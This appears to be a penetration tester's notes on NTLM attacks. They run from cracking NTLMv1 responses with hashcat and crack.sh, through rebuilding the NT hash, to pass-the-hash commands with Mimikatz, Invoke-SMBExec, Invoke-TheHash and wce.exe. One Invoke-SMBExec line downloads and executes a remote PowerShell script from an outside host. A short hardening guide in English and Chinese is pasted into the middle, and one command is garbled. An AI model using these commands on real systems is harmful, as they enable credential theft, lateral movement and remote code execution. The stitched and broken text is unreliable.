NTLM

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t REG_DWORD /d 5 /f

0 - Send LM & NTLM responses
1 - Send LM & NTLM responses, use NTLMv2 session security if negotiated
2 - Send NTLM response only
3 - Send NTLMv2 response only
4 - Send NTLMv2 response only, refuse LM
5 - Send NTLMv2 response only, refuse LM & NTLM

python3 ntlmv1.py --ntlmv1 hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788

['hashcat', '', 'DUSTIN-5AA37877', '76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D', '727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595', '1122334455667788']

Hostname: DUSTIN-5AA37877
Username: hashcat
Challenge: 1122334455667788
LM Response: 76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D
NT Response: 727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595
CT1: 727B4E35F947129E
CT2: A52B9CDEDAE86934
CT3: BB23EF89F50FC595

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788

To crack with hashcat create a file with the following contents:
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1

To Crack with crack.sh use the following token
NTHASH:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595

# NTLM Hardening

NTLM (NT LAN Manager) is a suite of Microsoft security protocols that provides authentication, integrity, and confidentiality to users. However, NTLM is considered weak and vulnerable to various attacks. This document outlines steps to harden NTLM in your environment.

## Disable NTLM

To enhance security, it is recommended to disable NTLM authentication wherever possible. This can be done through Group Policy settings.

## Use Kerberos

Whenever possible, switch to Kerberos authentication, which is more secure than NTLM. Ensure that all services and applications support Kerberos.

## Monitor NTLM Usage

Regularly monitor NTLM usage in your environment. Use tools like Windows Event Logs to identify and analyze NTLM authentication attempts.

## Limit NTLM Access

Restrict NTLM access to only those users and services that absolutely need it. This minimizes the attack surface.

## Implement Security Policies

Establish security policies that enforce the use of strong passwords and account lockout policies to protect against brute-force attacks.

## Conclusion

By following these steps, you can significantly reduce the risks associated with NTLM in your environment.

# NTLM 加固

NTLM（NT LAN Manager）是一套微软安全协议，为用户提供身份验证、完整性和机密性。然而，NTLM 被认为是弱的，并且容易受到各种攻击。本文档概述了在您的环境中加固 NTLM 的步骤。

## 禁用 NTLM

为了增强安全性，建议在可能的情况下禁用 NTLM 身份验证。这可以通过组策略设置来完成。

## 使用 Kerberos

在可能的情况下，切换到 Kerberos 身份验证，它比 NTLM 更安全。确保所有服务和应用程序都支持 Kerberos。

## 监控 NTLM 使用情况

定期监控您环境中的 NTLM 使用情况。使用 Windows 事件日志等工具来识别和分析 NTLM 身份验证尝试。

## 限制 NTLM 访问

仅限于绝对需要 NTLM 的用户和服务，限制 NTLM 访问。这可以最小化攻击面。

## 实施安全策略

建立安全策略，强制使用强密码和账户锁定策略，以防止暴力攻击。

## 结论

通过遵循这些步骤，您可以显著降低与 NTLM 相关的风险。

727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788

./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1

python ntlm-to-des.py --ntlm b4b9b02e6f09a9bd760f388b67351e2b
DESKEY1: b55d6d04e67926
DESKEY2: bcba83e6895b9d

echo b55d6d04e67926>>des.cand
echo bcba83e6895b9d>>des.cand

./hashcat-utils/src/deskey_to_ntlm.pl b55d6d05e7792753
b4b9b02e6f09a9 # this is part 1

./hashcat-utils/src/deskey_to_ntlm.pl bcba83e6895b9d
bd760f388b6700 # this is part 2

./hashcat-utils/src/ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788

586c # this is the last part

NTHASH=b4b9b02e6f09a9bd760f388b6700586c

Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'

Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose

Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose

Invoke-SMBClient -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 [-Action Recurse] -Source \\dcorp-mgmt.my.domain.local\C$\ -verbose

Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 -Target dcorp-mgmt.dollarcorp.moneycorp.local -verbose

Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administ -ty    h F6F38B793DB6A94BA04A52F1D3EE92F0

wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>